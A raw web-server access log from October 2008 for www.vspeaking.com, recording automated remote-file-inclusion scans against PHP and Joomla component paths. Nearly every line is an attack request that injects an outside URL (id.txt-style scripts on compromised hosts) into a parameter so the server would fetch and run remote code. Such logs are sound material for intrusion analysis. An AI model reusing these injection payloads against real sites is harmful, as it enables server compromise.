64.22.110.198 - - [26/Oct/2008:19:43:57 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://vie.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
64.22.110.198 - - [26/Oct/2008:19:43:57 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://vie.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:19:44:49 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://www.stormpages.com/arale/child/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
72.249.108.100 - - [26/Oct/2008:19:45:05 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.vspeaking.com"
72.249.108.100 - - [26/Oct/2008:19:45:05 -0700] "GET /logs/access_080811.log//modules/vwar/admin/admin.php?vwar_root=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.vspeaking.com"
72.249.108.100 - - [26/Oct/2008:19:45:05 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.vspeaking.com"
72.249.108.100 - - [26/Oct/2008:19:45:57 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.vspeaking.com"
72.249.108.100 - - [26/Oct/2008:19:46:43 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.vspeaking.com"
72.249.108.100 - - [26/Oct/2008:19:46:43 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.vspeaking.com"
72.249.108.100 - - [26/Oct/2008:19:46:43 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.vspeaking.com"
193.255.140.22 - - [26/Oct/2008:19:47:32 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
193.255.140.22 - - [26/Oct/2008:19:47:32 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
193.255.140.22 - - [26/Oct/2008:19:47:32 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
64.22.110.198 - - [26/Oct/2008:19:47:42 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://vie.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:19:48:39 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://www.stormpages.com/arale/child/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
190.196.5.189 - - [26/Oct/2008:19:48:41 -0700] "GET /logs/access.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.snack-bee.de/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.vspeaking.com"
190.196.5.189 - - [26/Oct/2008:19:48:46 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.snack-bee.de/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.vspeaking.com"
190.196.5.189 - - [26/Oct/2008:19:48:50 -0700] "GET /logs//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.snack-bee.de/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:19:48:50 -0700] "GET /logs/access_080707.log//?path%5Bdocroot%5D=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:19:48:52 -0700] "GET /?path%5Bdocroot%5D=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:19:48:52 -0700] "GET /logs/access_080804.log//?path%5Bdocroot%5D=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:19:48:52 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 200 2373 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:19:49:19 -0700] "GET /logs/access_080804.log//?path%5Bdocroot%5D=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:19:49:19 -0700] "GET /?path%5Bdocroot%5D=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:19:49:19 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 200 2373 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.vspeaking.com"
68.122.36.10 - - [26/Oct/2008:19:49:21 -0700] "GET /logs/access.log//errors.php?error=http://www.dehouse.com.br/site/thumb/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
68.122.36.10 - - [26/Oct/2008:19:49:22 -0700] "GET /errors.php?error=http://www.dehouse.com.br/site/thumb/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:19:49:22 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.vspeaking.com"
68.122.36.10 - - [26/Oct/2008:19:49:23 -0700] "GET /logs//errors.php?error=http://www.dehouse.com.br/site/thumb/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
74.53.39.34 - - [26/Oct/2008:19:49:28 -0700] "GET /logs/index.php?redir=http://mystjohn.org/calendar/docs/_vti_cnf/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
74.53.39.34 - - [26/Oct/2008:19:49:28 -0700] "GET /index.php?redir=http://mystjohn.org/calendar/docs/_vti_cnf/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:19:50:09 -0700] "GET /logs/access_080804.log//?path%5Bdocroot%5D=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:19:50:09 -0700] "GET /?path%5Bdocroot%5D=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:19:50:09 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 200 2373 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:19:50:24 -0700] "GET /logs/access_080707.log//?path%5Bdocroot%5D=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
89.203.140.19 - - [26/Oct/2008:19:50:31 -0700] "GET /logs/access_080818.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://usuarios.lycos.es/h80Soft/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
78.111.80.12 - - [26/Oct/2008:19:50:35 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.jockey.mn/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
64.22.110.198 - - [26/Oct/2008:19:50:40 -0700] "GET /logs/access_080707.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://vie.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:19:50:47 -0700] "GET /logs/access_080707.log//?path%5Bdocroot%5D=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:19:51:33 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.vspeaking.com"
193.255.140.22 - - [26/Oct/2008:19:51:36 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.guidingbrightminds.com/phpbb/templates/subSilver/inc_ssl.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.vspeaking.com"
193.255.140.22 - - [26/Oct/2008:19:51:37 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.guidingbrightminds.com/phpbb/templates/subSilver/inc_ssl.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.vspeaking.com"
193.255.140.22 - - [26/Oct/2008:19:51:40 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.guidingbrightminds.com/phpbb/templates/subSilver/inc_ssl.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.vspeaking.com"
89.203.140.19 - - [26/Oct/2008:19:51:44 -0700] "GET /logs/access.log%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://usuarios.lycos.es/h80Soft/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:19:51:49 -0700] "GET /logs/access_080707.log//?path%5Bdocroot%5D=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:19:52:05 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
72.32.215.50 - - [26/Oct/2008:19:53:21 -0700] "GET /logs/access_080811.log//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
72.32.215.50 - - [26/Oct/2008:19:53:21 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
72.32.215.50 - - [26/Oct/2008:19:53:21 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
193.255.140.22 - - [26/Oct/2008:19:53:52 -0700] "GET /logs/access.log%22%20class=%22neww%22%20target=%22_blank%22%20title=%22Im%20neuen%20Fenster%20öffnen//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.guidingbrightminds.com/phpbb/templates/subSilver/inc_ssl.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.vspeaking.com"
72.32.215.50 - - [26/Oct/2008:19:53:55 -0700] "GET /logs/access_080811.log//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
72.32.215.50 - - [26/Oct/2008:19:53:55 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
72.32.215.50 - - [26/Oct/2008:19:53:55 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
72.32.215.50 - - [26/Oct/2008:19:54:05 -0700] "GET /logs/access_080811.log//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
72.32.215.50 - - [26/Oct/2008:19:54:05 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
72.32.215.50 - - [26/Oct/2008:19:54:05 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
129.187.254.85 - - [26/Oct/2008:19:54:11 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
129.187.254.85 - - [26/Oct/2008:19:54:11 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
129.187.254.85 - - [26/Oct/2008:19:54:11 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
129.187.254.85 - - [26/Oct/2008:19:54:12 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
129.187.254.85 - - [26/Oct/2008:19:54:12 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
129.187.254.85 - - [26/Oct/2008:19:54:12 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
190.7.196.100 - - [26/Oct/2008:19:54:29 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://usuarios.lycos.es/h80Soft/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
190.7.196.100 - - [26/Oct/2008:19:54:29 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://usuarios.lycos.es/h80Soft/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
190.7.196.100 - - [26/Oct/2008:19:54:29 -0700] "GET /logs/access.log%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://usuarios.lycos.es/h80Soft/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
195.70.35.215 - - [26/Oct/2008:19:54:37 -0700] "GET /logs/access_080804.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://85.159.65.83:32000//accounts/inc/schicksalstot.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
195.70.35.215 - - [26/Oct/2008:19:54:38 -0700] "GET /logs/access_080804.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://webmail.wanacom.com.ar:32000//accounts/lang/de/sdgfhsdf7.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
195.70.35.215 - - [26/Oct/2008:19:54:38 -0700] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://85.159.65.83:32000//accounts/inc/schicksalstot.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
195.70.35.215 - - [26/Oct/2008:19:54:38 -0700] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://webmail.wanacom.com.ar:32000//accounts/lang/de/sdgfhsdf7.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
195.70.35.215 - - [26/Oct/2008:19:54:38 -0700] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://85.159.65.83:32000//accounts/inc/schicksalstot.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
195.70.35.215 - - [26/Oct/2008:19:54:39 -0700] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://webmail.wanacom.com.ar:32000//accounts/lang/de/sdgfhsdf7.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
72.32.215.50 - - [26/Oct/2008:19:55:01 -0700] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.datadandy.net/backend/plugins/kethek-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
72.32.215.50 - - [26/Oct/2008:19:55:11 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
129.187.254.85 - - [26/Oct/2008:19:55:47 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
129.187.254.85 - - [26/Oct/2008:19:55:47 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
129.187.254.85 - - [26/Oct/2008:19:55:47 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
72.32.215.50 - - [26/Oct/2008:19:55:55 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
195.70.35.215 - - [26/Oct/2008:19:55:57 -0700] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://85.159.65.83:32000//accounts/inc/schicksalstot.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
195.70.35.215 - - [26/Oct/2008:19:55:57 -0700] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://webmail.wanacom.com.ar:32000//accounts/lang/de/sdgfhsdf7.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
190.7.196.100 - - [26/Oct/2008:19:55:58 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://usuarios.lycos.es/h80Soft/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
72.32.215.50 - - [26/Oct/2008:19:56:02 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
74.53.39.34 - - [26/Oct/2008:19:56:04 -0700] "GET /logs/access_080811.log/index.php?redir=http://mystjohn.org/calendar/docs/_vti_cnf/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
193.255.140.22 - - [26/Oct/2008:19:56:05 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
193.255.140.22 - - [26/Oct/2008:19:56:08 -0700] "GET /logs/access_080811.log//modules/vwar/admin/admin.php?vwar_root=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
193.255.140.22 - - [26/Oct/2008:19:56:08 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
202.144.158.163 - - [26/Oct/2008:19:56:14 -0700] "GET /errors.php?error=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
202.144.158.163 - - [26/Oct/2008:19:56:14 -0700] "GET /logs/access.log//errors.php?error=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
202.144.158.163 - - [26/Oct/2008:19:56:15 -0700] "GET /logs//errors.php?error=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:19:56:17 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.vspeaking.com"
129.187.254.85 - - [26/Oct/2008:19:56:20 -0700] "GET /logs/access_080811.log//modules/vwar/admin/admin.php?vwar_root=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
129.187.254.85 - - [26/Oct/2008:19:56:22 -0700] "GET /logs/access_080811.log//modules/vwar/admin/admin.php?vwar_root=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
98.202.67.0 - - [26/Oct/2008:19:56:31 -0700] "GET /logs/access.log%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://usuarios.lycos.es/h80Soft/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
98.202.67.0 - - [26/Oct/2008:19:56:31 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://usuarios.lycos.es/h80Soft/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
98.202.67.0 - - [26/Oct/2008:19:56:32 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://usuarios.lycos.es/h80Soft/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
195.70.35.215 - - [26/Oct/2008:19:57:07 -0700] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://85.159.65.83:32000//accounts/inc/schicksalstot.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
195.70.35.215 - - [26/Oct/2008:19:57:08 -0700] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://webmail.wanacom.com.ar:32000//accounts/lang/de/sdgfhsdf7.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
141.89.66.2 - - [26/Oct/2008:19:57:11 -0700] "GET /logs/access_080825.log//s_loadenv.inc.php?DOCUMENT_ROOT=http;//www.tabernus.com/company/spread.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.vspeaking.com"
141.89.66.2 - - [26/Oct/2008:19:57:11 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http;//www.tabernus.com/company/spread.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.vspeaking.com"
141.89.66.2 - - [26/Oct/2008:19:57:12 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http;//www.tabernus.com/company/spread.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.vspeaking.com"
141.89.66.2 - - [26/Oct/2008:19:57:14 -0700] "GET /logs/access_080825.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tabernus.com/company/l333tbi1tX.txt???? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.vspeaking.com"
141.89.66.2 - - [26/Oct/2008:19:57:14 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tabernus.com/company/l333tbi1tX.txt???? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.vspeaking.com"
141.89.66.2 - - [26/Oct/2008:19:57:14 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tabernus.com/company/l333tbi1tX.txt???? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.vspeaking.com"
129.187.254.85 - - [26/Oct/2008:19:57:49 -0700] "GET /logs/access_080811.log//modules/vwar/admin/admin.php?vwar_root=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
193.255.140.22 - - [26/Oct/2008:19:58:16 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
